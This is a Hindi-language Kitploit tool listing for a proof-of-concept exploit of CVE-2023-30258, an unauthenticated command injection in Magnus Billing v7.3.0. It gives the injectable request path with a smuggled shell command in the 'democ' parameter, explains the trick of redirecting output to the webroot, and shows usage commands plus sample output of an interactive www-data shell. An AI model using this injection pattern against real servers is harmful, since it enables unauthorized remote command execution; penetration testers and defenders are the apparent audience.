Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-30258-Magnus-Billing-v7-Command-Injection-PoC — Magnus Billing v7.3.0 में अनधिकृत कमांड इंजेक्शन भेद्यता। | Kitploit
उपकरण/GitHubGitHub/estebanzarate/cve-2023-30258-magnus-billing-v7-command-injection-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubestebanzarate/cve-2023-30258-magnus-billing-v7-command-injection-poc

CVE-2023-30258-Magnus-Billing-v7-Command-Injection-PoC

Magnus Billing v7.3.0 में अनधिकृत कमांड इंजेक्शन भेद्यता।

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
15 महीने पहलेअभी तक समीक्षित नहीं

CVE-2023-30258 — Magnus Billing v7 कमांड इंजेक्शन (PoC)

प्रमाणीकरण रहित कमांड इंजेक्शन भेद्यता Magnus Billing v7.3.0 में। icepay.php में democ GET पैरामीटर बिना स्वच्छता के सीधे शेल फ़ंक्शन में पारित किया जाता है, जिससे वेब सर्वर उपयोगकर्ता के रूप में मनमाना कमांड निष्पादन संभव होता है। इंजेक्शन अंधा है — आउटपुट HTTP प्रतिक्रिया में प्रतिबिंबित नहीं होता — इसलिए यह शोषण प्रत्येक कमांड के आउटपुट को वेबरूट में एक फ़ाइल में रीडायरेक्ट करता है और इसे HTTP पर वापस लाता है।


यह कैसे काम करता है

  1. GET अनुरोध भेजता है /mbilling/lib/icepay/icepay.php?democ=;<command>; पर।
  2. कमांड आउटपुट को वेबरूट के अंदर एक फ़ाइल (out.txt) में रीडायरेक्ट करता है।
  3. आउटपुट फ़ाइल को HTTP पर लाता है और परिणाम प्रिंट करता है।
  4. बाहर निकलने पर आउटपुट फ़ाइल को साफ करता है।

यदि लक्ष्य एक अलग वेबरूट पथ का उपयोग करता है, तो स्क्रिप्ट के शीर्ष पर OUTPUT_FILE को समायोजित करें।

आवश्यकताएँ

  • Python 3
  • निर्भरताएँ स्थापित करें:
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit

उपयोग

root@kitploit:~
python3 exploit.py -t http://TARGET

उदाहरण:

root@kitploit:~
$ python3 exploit.py -t http://10.10.10.10
[*] Testing command execution...
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.

Shell> whoami
www-data

संदर्भ

  • CVE-2023-30258
  • EDB-52170
  • Tinashe Matanda द्वारा मूल PoC

श्रेय

  • खोज और मूल शोषण: Tinashe Matanda (SadNinja) / CodeSecLab
  • सफाई और इंटरैक्टिव शेल: Esteban Zárate
टूल डाउनलोड करें